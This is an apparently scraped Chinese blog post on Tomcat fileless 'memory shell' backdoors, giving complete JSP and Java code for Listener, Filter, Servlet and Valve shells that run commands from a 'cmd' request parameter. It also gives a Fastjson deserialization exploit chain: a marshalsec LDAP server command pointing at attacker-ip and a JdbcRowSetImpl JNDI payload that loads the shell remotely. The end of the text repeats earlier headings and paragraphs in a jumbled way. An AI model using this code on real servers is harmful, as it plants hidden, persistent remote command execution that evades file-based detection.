Tomcat内存马分析与实现<\/h1>

前言<\/h2>
Tomcat内存马是一种在Web服务器内存中驻留的后门技术，不依赖文件系统，难以被传统安全防护手段检测。本文将详细分析Tomcat中四种内存马实现方式：Listener、Filter、Servlet和Valve。<\/p>

环境准备<\/h2>

开发环境：IDEA 2024.2.3<\/li>
服务器环境：Apache Tomcat 8.5.69<\/li>

JDK版本：1.8.0_66<\/li> <\/ul>

核心概念<\/h2>

StandardContext<\/h3>

StandardContext是Tomcat架构中的核心类，代表一个Web应用程序，提供以下重要功能：<\/p>

管理应用程序的生命周期<\/li>
维护Listener、Filter、Servlet等组件<\/li>

处理请求路由<\/li> <\/ul>

Listener内存马<\/h2>

原理分析<\/h3>
ServletRequestListener接口允许在请求初始化和销毁时执行自定义逻辑。Tomcat通过StandardContext的applicationEventListenersList维护所有Listener。<\/p>

实现步骤<\/h3>

获取StandardContext对象<\/li>
创建恶意Listener类<\/li>

将Listener添加到StandardContext<\/li> <\/ol>

JSP实现代码<\/h3>

<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.io.IOException" %>
<%@ page contentType="text\/html;charset=UTF-8" language="java" %>

<%!
class VulListener implements ServletRequestListener {
    @Override public void requestDestroyed(ServletRequestEvent e) {}
    
    @Override public void requestInitialized(ServletRequestEvent e) {
        String cmd = e.getServletRequest().getParameter("cmd");
        try { Runtime.getRuntime().exec(cmd); } 
        catch (IOException ex) { throw new RuntimeException(ex); }
    }
}
%>

<%
Field reqField = request.getClass().getDeclaredField("request");
reqField.setAccessible(true);
Request req = (Request) reqField.get(request);
StandardContext ctx = (StandardContext) req.getContext();
ctx.addApplicationEventListener(new VulListener());
%>
<\/code><\/pre>
反序列化实现<\/h3>
import<\/span> org.apache.catalina.core.StandardContext;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.loader.WebappClassLoaderBase;<\/span>
<\/span><\/span>import<\/span> javax.servlet.ServletRequestEvent;<\/span>
<\/span><\/span>import<\/span> javax.servlet.ServletRequestListener;<\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> ListenerMemory<\/span> implements<\/span> ServletRequestListener {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        WebappClassLoaderBase loader =<\/span> (<\/span>WebappClassLoaderBase)<\/span> 
<\/span><\/span>            Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>        StandardContext ctx =<\/span> (<\/span>StandardContext)<\/span> loader.<\/span>getResources<\/span>().<\/span>getContext<\/span>();<\/span>
<\/span><\/span>        ctx.<\/span>addApplicationEventListener<\/span>(<\/span>new<\/span> ListenerMemory());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> requestDestroyed<\/span>(<\/span>ServletRequestEvent e)<\/span> {}<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> requestInitialized<\/span>(<\/span>ServletRequestEvent e)<\/span> {<\/span>
<\/span><\/span>        String cmd =<\/span> e.<\/span>getServletRequest<\/span>().<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        try<\/span> {<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span> }<\/span> 
<\/span><\/span>        catch<\/span> (<\/span>IOException ex)<\/span> {<\/span> throw<\/span> new<\/span> RuntimeException(<\/span>ex);<\/span> }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Filter内存马<\/h2>
原理分析<\/h3>
Filter通过ApplicationFilterChain处理请求，StandardContext维护filterMaps和filterConfigs来管理Filter。<\/p>
实现步骤<\/h3>

获取StandardContext<\/li>
创建恶意Filter<\/li>
创建FilterMap和FilterDef<\/li>
创建ApplicationFilterConfig<\/li>
将配置添加到StandardContext<\/li>
<\/ol>
JSP实现代码<\/h3>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.io.*" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.*" %>
<%@ page import="org.apache.catalina.core.*" %>
<%@ page import="org.apache.catalina.*" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.util.Map" %>
<%@ page import="org.apache.catalina.connector.Request" %>

<%!
class VulFilter implements Filter {
    @Override public void init(FilterConfig config) throws ServletException {}
    
    @Override public void doFilter(ServletRequest req, ServletResponse res, 
            FilterChain chain) throws IOException, ServletException {
        String cmd = req.getParameter("cmd");
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = br.readLine()) != null) {
            res.getWriter().write(line);
        }
    }
    
    @Override public void destroy() {}
}
%>

<%
Field f = request.getClass().getDeclaredField("request");
f.setAccessible(true);
Request req = (Request) f.get(request);
StandardContext ctx = (StandardContext) req.getContext();

VulFilter filter = new VulFilter();
String name = "VulFilter";

FilterMap map = new FilterMap();
map.addURLPattern("\/*");
map.setFilterName(name);

FilterDef def = new FilterDef();
def.setFilterName(name);
def.setFilterClass(filter.getClass().getName());
def.setFilter(filter);

Field configsField = ctx.getClass().getDeclaredField("filterConfigs");
configsField.setAccessible(true);
Map<String,Object> configs = (Map<String, Object>) configsField.get(ctx);

ctx.addFilterDef(def);
ctx.addFilterMap(map);

Constructor<ApplicationFilterConfig> ctor = 
    ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
ctor.setAccessible(true);
ApplicationFilterConfig config = ctor.newInstance(ctx, def);
configs.put(name, config);
%>
<\/code><\/pre>
反序列化实现<\/h3>
import<\/span> org.apache.catalina.*;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.core.*;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.loader.WebappClassLoaderBase;<\/span>
<\/span><\/span>import<\/span> org.apache.tomcat.util.descriptor.web.*;<\/span>
<\/span><\/span>import<\/span> javax.servlet.*;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.*;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> FilterMemory<\/span> implements<\/span> Filter {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            WebappClassLoaderBase loader =<\/span> (<\/span>WebappClassLoaderBase)<\/span> 
<\/span><\/span>                Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>            StandardContext ctx =<\/span> (<\/span>StandardContext)<\/span> loader.<\/span>getResources<\/span>().<\/span>getContext<\/span>();<\/span>
<\/span><\/span>            
<\/span><\/span>            FilterMemory filter =<\/span> new<\/span> FilterMemory();<\/span>
<\/span><\/span>            String name =<\/span> "FilterMemory"<\/span>;<\/span>
<\/span><\/span>            
<\/span><\/span>            FilterMap map =<\/span> new<\/span> FilterMap();<\/span>
<\/span><\/span>            map.<\/span>addURLPattern<\/span>(<\/span>"\/*"<\/span>);<\/span>
<\/span><\/span>            map.<\/span>setFilterName<\/span>(<\/span>name);<\/span>
<\/span><\/span>            
<\/span><\/span>            FilterDef def =<\/span> new<\/span> FilterDef();<\/span>
<\/span><\/span>            def.<\/span>setFilterName<\/span>(<\/span>name);<\/span>
<\/span><\/span>            def.<\/span>setFilterClass<\/span>(<\/span>filter.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span>
<\/span><\/span>            def.<\/span>setFilter<\/span>(<\/span>filter);<\/span>
<\/span><\/span>            
<\/span><\/span>            Field configsField =<\/span> ctx.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"filterConfigs"<\/span>);<\/span>
<\/span><\/span>            configsField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            Map<<\/span>String,<\/span>Object><\/span> configs =<\/span> (<\/span>Map<<\/span>String,<\/span> Object>)<\/span> configsField.<\/span>get<\/span>(<\/span>ctx);<\/span>
<\/span><\/span>            
<\/span><\/span>            ctx.<\/span>addFilterDef<\/span>(<\/span>def);<\/span>
<\/span><\/span>            ctx.<\/span>addFilterMap<\/span>(<\/span>map);<\/span>
<\/span><\/span>            
<\/span><\/span>            Constructor<<\/span>ApplicationFilterConfig><\/span> ctor =<\/span> 
<\/span><\/span>                ApplicationFilterConfig.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>(<\/span>Context.<\/span>class<\/span>,<\/span> FilterDef.<\/span>class<\/span>);<\/span>
<\/span><\/span>            ctor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            ApplicationFilterConfig config =<\/span> ctor.<\/span>newInstance<\/span>(<\/span>ctx,<\/span> def);<\/span>
<\/span><\/span>            configs.<\/span>put<\/span>(<\/span>name,<\/span> config);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> init<\/span>(<\/span>FilterConfig config)<\/span> throws<\/span> ServletException {}<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest req,<\/span> ServletResponse res,<\/span> 
<\/span><\/span>            FilterChain chain)<\/span> throws<\/span> IOException,<\/span> ServletException {<\/span>
<\/span><\/span>        String cmd =<\/span> req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        Process p =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>        BufferedReader br =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>p.<\/span>getInputStream<\/span>()));<\/span>
<\/span><\/span>        String line;<\/span>
<\/span><\/span>        while<\/span> ((<\/span>line =<\/span> br.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            res.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>line);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> destroy<\/span>()<\/span> {}<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Servlet内存马<\/h2>
原理分析<\/h3>
Servlet通过StandardWrapper管理，StandardContext维护children集合和servlet映射。<\/p>
实现步骤<\/h3>

获取StandardContext<\/li>
创建恶意Servlet<\/li>
创建StandardWrapper并设置属性<\/li>
将Wrapper添加到Context<\/li>
添加Servlet映射<\/li>
<\/ol>
JSP实现代码<\/h3>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.core.StandardWrapper" %>
<%@ page import="org.apache.catalina.Container" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>

<%!
class VulServlet implements Servlet {
    @Override public void init(ServletConfig config) throws ServletException {}
    
    @Override public ServletConfig getServletConfig() { return null; }
    
    @Override public void service(ServletRequest req, ServletResponse res) 
            throws ServletException, IOException {
        String cmd = req.getParameter("cmd");
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while((line = br.readLine()) != null) {
            res.getWriter().write(line);
        }
    }
    
    @Override public String getServletInfo() { return ""; }
    
    @Override public void destroy() {}
}
%>

<%
Field f = request.getClass().getDeclaredField("request");
f.setAccessible(true);
Request req = (Request) f.get(request);
StandardContext ctx = (StandardContext) req.getContext();

VulServlet servlet = new VulServlet();
StandardWrapper wrapper = new StandardWrapper();
String name = "VulServlet";
String url = "\/v";

wrapper.setServlet(servlet);
wrapper.setServletClass(servlet.getClass().getName());
wrapper.setServletName(name);

ctx.addChild(wrapper);
ctx.addServletMappingDecoded(url, name);
%>
<\/code><\/pre>
反序列化实现<\/h3>
import<\/span> org.apache.catalina.*;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.core.*;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.loader.WebappClassLoaderBase;<\/span>
<\/span><\/span>import<\/span> javax.servlet.*;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> ServletMemory<\/span> implements<\/span> Servlet {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        WebappClassLoaderBase loader =<\/span> (<\/span>WebappClassLoaderBase)<\/span> 
<\/span><\/span>            Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>        StandardContext ctx =<\/span> (<\/span>StandardContext)<\/span> loader.<\/span>getResources<\/span>().<\/span>getContext<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        ServletMemory servlet =<\/span> new<\/span> ServletMemory();<\/span>
<\/span><\/span>        StandardWrapper wrapper =<\/span> new<\/span> StandardWrapper();<\/span>
<\/span><\/span>        String name =<\/span> "ServletMemory"<\/span>;<\/span>
<\/span><\/span>        String url =<\/span> "\/s"<\/span>;<\/span>
<\/span><\/span>        
<\/span><\/span>        wrapper.<\/span>setServlet<\/span>(<\/span>servlet);<\/span>
<\/span><\/span>        wrapper.<\/span>setServletClass<\/span>(<\/span>servlet.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span>
<\/span><\/span>        wrapper.<\/span>setServletName<\/span>(<\/span>name);<\/span>
<\/span><\/span>        
<\/span><\/span>        ctx.<\/span>addChild<\/span>(<\/span>wrapper);<\/span>
<\/span><\/span>        ctx.<\/span>addServletMappingDecoded<\/span>(<\/span>url,<\/span> name);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> init<\/span>(<\/span>ServletConfig config)<\/span> throws<\/span> ServletException {}<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span> public<\/span> ServletConfig getServletConfig<\/span>()<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> service<\/span>(<\/span>ServletRequest req,<\/span> ServletResponse res)<\/span> 
<\/span><\/span>            throws<\/span> ServletException,<\/span> IOException {<\/span>
<\/span><\/span>        String cmd =<\/span> req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        Process p =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>        BufferedReader br =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>p.<\/span>getInputStream<\/span>()));<\/span>
<\/span><\/span>        String line;<\/span>
<\/span><\/span>        while<\/span>((<\/span>line =<\/span> br.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            res.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>line);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span> public<\/span> String getServletInfo<\/span>()<\/span> {<\/span> return<\/span> ""<\/span>;<\/span> }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> destroy<\/span>()<\/span> {}<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Valve内存马<\/h2>
原理分析<\/h3>
Valve是Tomcat的管道组件，可以拦截和处理请求。StandardContext维护pipeline和valves链。<\/p>
实现步骤<\/h3>

获取StandardContext<\/li>
创建恶意Valve实现<\/li>
将Valve添加到Context<\/li>
<\/ol>
JSP实现代码<\/h3>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.Valve" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>

<%!
class VulValve implements Valve {
    @Override public Valve getNext() { return null; }
    @Override public void setNext(Valve valve) {}
    @Override public void backgroundProcess() {}
    @Override public boolean isAsyncSupported() { return false; }
    
    @Override public void invoke(Request req, Response res) 
            throws IOException, ServletException {
        String cmd = req.getParameter("cmd");
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = br.readLine()) != null) {
            res.getWriter().write(line);
        }
    }
}
%>

<%
Field f = request.getClass().getDeclaredField("request");
f.setAccessible(true);
Request req = (Request) f.get(request);
StandardContext ctx = (StandardContext) req.getContext();
ctx.addValve(new VulValve());
%>
<\/code><\/pre>
反序列化实现<\/h3>
import<\/span> org.apache.catalina.*;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.core.*;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.loader.WebappClassLoaderBase;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> ValveMemory<\/span> implements<\/span> Valve {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        WebappClassLoaderBase loader =<\/span> (<\/span>WebappClassLoaderBase)<\/span> 
<\/span><\/span>            Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>        StandardContext ctx =<\/span> (<\/span>StandardContext)<\/span> loader.<\/span>getResources<\/span>().<\/span>getContext<\/span>();<\/span>
<\/span><\/span>        ctx.<\/span>addValve<\/span>(<\/span>new<\/span> ValveMemory());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span> public<\/span> Valve getNext<\/span>()<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> setNext<\/span>(<\/span>Valve valve)<\/span> {}<\/span>
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> backgroundProcess<\/span>()<\/span> {}<\/span>
<\/span><\/span>    @Override<\/span> public<\/span> boolean<\/span> isAsyncSupported<\/span>()<\/span> {<\/span> return<\/span> false<\/span>;<\/span> }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span> public<\/span> void<\/span> invoke<\/span>(<\/span>Request req,<\/span> Response res)<\/span> 
<\/span><\/span>            throws<\/span> IOException,<\/span> ServletException {<\/span>
<\/span><\/span>        String cmd =<\/span> req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        Process p =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>        BufferedReader br =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>p.<\/span>getInputStream<\/span>()));<\/span>
<\/span><\/span>        String line;<\/span>
<\/span><\/span>        while<\/span> ((<\/span>line =<\/span> br.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            res.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>line);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>反序列化注入实战<\/h2>
Fastjson靶场搭建<\/h3>

创建Web项目并添加Fastjson 1.2.24依赖<\/li>
创建漏洞Servlet：<\/li>
<\/ol>
@WebServlet<\/span>(<\/span>"\/FastJsonServlet"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> FastJsonServlet<\/span> extends<\/span> HttpServlet {<\/span>
<\/span><\/span>    protected<\/span> void<\/span> doPost<\/span>(<\/span>HttpServletRequest req,<\/span> HttpServletResponse res)<\/span> 
<\/span><\/span>            throws<\/span> ServletException,<\/span> IOException {<\/span>
<\/span><\/span>        BufferedReader br =<\/span> req.<\/span>getReader<\/span>();<\/span>
<\/span><\/span>        StringBuilder sb =<\/span> new<\/span> StringBuilder();<\/span>
<\/span><\/span>        String line;<\/span>
<\/span><\/span>        while<\/span> ((<\/span>line =<\/span> br.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> sb.<\/span>append<\/span>(<\/span>line);<\/span>
<\/span><\/span>        JSON.<\/span>parseObject<\/span>(<\/span>sb.<\/span>toString<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用JNDI注入<\/h3>

使用marshalsec搭建LDAP服务：<\/li>
<\/ol>
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 
    http:\/\/attacker-ip:8000\/#MemoryShell 9999
<\/code><\/pre>

发送恶意请求：<\/li>
<\/ol>
{
<\/span><\/span>    "a"<\/span>: { "@type"<\/span>: "java.lang.Class"<\/span>, "val"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span> },
<\/span><\/span>    "b"<\/span>: { 
<\/span><\/span>        "@type"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>,
<\/span><\/span>        "dataSourceName"<\/span>: "ldap:\/\/attacker-ip:9999\/MemoryShell"<\/span>,
<\/span><\/span>        "autoCommit"<\/span>: true<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>

Listener内存马<\/strong>：通过StandardContext的applicationEventListenersList注入<\/li>
Filter内存马<\/strong>：需要操作StandardContext的filterMaps和filterConfigs<\/li>
Servlet内存马<\/strong>：通过StandardWrapper和StandardContext的children注入<\/li>
Valve内存马<\/strong>：通过StandardContext的pipeline注入<\/li>
<\/ol>
所有内存马的核心都是通过反射获取和操作StandardContext对象，利用Tomcat的组件机制实现无文件持久化。<\/p>

Tomcat内存马分析与实现<\/h1>

前言<\/h2> Tomcat内存马是一种在Web服务器内存中驻留的后门技术，不依赖文件系统，难以被传统安全防护手段检测。本文将详细分析Tomcat中四种内存马实现方式：Listener、Filter、Servlet和Valve。<\/p>

核心概念<\/h2>

Listener内存马<\/h2>

原理分析<\/h3> ServletRequestListener接口允许在请求初始化和销毁时执行自定义逻辑。Tomcat通过StandardContext的applicationEventListenersList维护所有Listener。<\/p>

Filter内存马<\/h2>

原理分析<\/h3> Filter通过ApplicationFilterChain处理请求，StandardContext维护filterMaps和filterConfigs来管理Filter。<\/p>

Servlet内存马<\/h2>

原理分析<\/h3> Servlet通过StandardWrapper管理，StandardContext维护children集合和servlet映射。<\/p>

Valve内存马<\/h2>

原理分析<\/h3> Valve是Tomcat的管道组件，可以拦截和处理请求。StandardContext维护pipeline和valves链。<\/p>

反序列化注入实战<\/h2>

前言<\/h2>
Tomcat内存马是一种在Web服务器内存中驻留的后门技术，不依赖文件系统，难以被传统安全防护手段检测。本文将详细分析Tomcat中四种内存马实现方式：Listener、Filter、Servlet和Valve。<\/p>

原理分析<\/h3>
ServletRequestListener接口允许在请求初始化和销毁时执行自定义逻辑。Tomcat通过StandardContext的applicationEventListenersList维护所有Listener。<\/p>

原理分析<\/h3>
Filter通过ApplicationFilterChain处理请求，StandardContext维护filterMaps和filterConfigs来管理Filter。<\/p>

原理分析<\/h3>
Servlet通过StandardWrapper管理，StandardContext维护children集合和servlet映射。<\/p>

原理分析<\/h3>
Valve是Tomcat的管道组件，可以拦截和处理请求。StandardContext维护pipeline和valves链。<\/p>